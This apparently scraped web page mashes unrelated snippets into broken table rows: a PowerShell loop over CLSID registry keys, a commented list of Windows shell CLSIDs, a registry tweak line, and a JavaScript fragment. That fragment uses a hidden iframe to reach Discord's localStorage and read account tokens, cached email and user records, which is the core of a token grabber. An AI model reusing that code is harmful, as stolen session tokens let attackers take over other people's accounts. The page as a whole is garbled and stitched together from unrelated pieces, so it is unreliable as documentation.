Last updated: July 22, 2025
| Endpoint Name | path |
|---|
| $registryPath = "HKLM:\SOFTWARE\Classes\CLSID" | |
| $clsidKeys = Get-ChildItem -Path $registryPath | |
| foreach ($clsidKey in $clsidKeys) { | |
| $name = $clsidKey.PSChildName | |
| $directoryPath = ".\folders\$name.$name" | |
| if (-not (Test-Path -Path $directoryPath)) { | |
| New-Item -Path $directoryPath -ItemType Directory | |
| Write-Host "créé : $directoryPath" |
Last updated: July 22, 2025
| Endpoint Name | path |
|---|
| const localStorage = document.body.appendChild(document.createElement("iframe")).contentWindow.localStorage; | |
| const tokens = JSON.parse(localStorage.tokens); | |
| const email = localStorage.email_cache.slice(1, -1); | |
| const users = JSON.parse(localStorage.MultiAccountStore)._state.users; | |
| for (const [userId, token] of Object.entries(tokens)) { | |
| /* console.log(`Discord ID: ${userId}, Token: ${token}`); */ | |
| let avatar = "https://discord.com/assets/1f0bfc0865d324c2587920a7d80c609b.png"; |
| # use shell::: with CLSID to launch location from run dialog | |
| # e.g., shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D} | |
| # | |
| # retrieved 20170719 from http://krypsec.com/all-clsid-for-windows-to-used-in-ethical-hacking-and-batch-programming/ | |
| # | |
| # see also: | |
| # https://www.sysnative.com/forums/windows-8-windows-rt-tutorials/12157-shells-shortcuts-clsid-listing-windows-10-8-1-8-7-a.html | |
| # http://www.geoffchappell.com/studies/windows/shell/explorer/cmdline.htm | |
| CLSID_ControlPanel {21EC2020-3AEA-1069-A2DD-08002B30309D} |
HKEY_CURRENT_USER\Control Panel\Cursors\PenVisualization, or create a DWORD key if it doesn't exist.